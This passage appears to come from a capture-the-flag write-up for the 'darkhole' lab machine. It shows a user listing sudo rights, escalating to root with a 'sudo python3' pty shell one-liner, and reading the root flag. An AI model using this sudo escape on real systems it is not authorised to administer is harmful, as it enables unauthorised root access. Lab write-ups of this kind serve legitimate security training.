losy@darkhole:~$ id
uid=1002(losy) gid=1002(losy) groups=1002(losy)

SUDO/Python Privilege Escalation

  • This user was already enumerated, so two routes remain:
    • sudo privilege escalation
    • kernel exploit
  • As for why sudo is still a candidate: no password was entered when the script ran, so it could not determine whether the user has sudo rights.
  • Check now:
losy@darkhole:~$ sudo -l
[sudo] password for losy:
Matching Defaults entries for losy on darkhole:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User losy may run the following commands on darkhole:
(root) /usr/bin/python3
  • Python3 can be run as root, which makes it simple:
losy@darkhole:~$ sudo /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')"
root@darkhole:/home/losy# id
uid=0(root) gid=0(root) groups=0(root)
  • Privilege escalation succeeded!

root.txt

  • The flag is in root's home directory:
root@darkhole:/home/losy# cd /root
root@darkhole:~# ls
root.txt snap
root@darkhole:~# cat root.txt
DarkHole{'Legend'}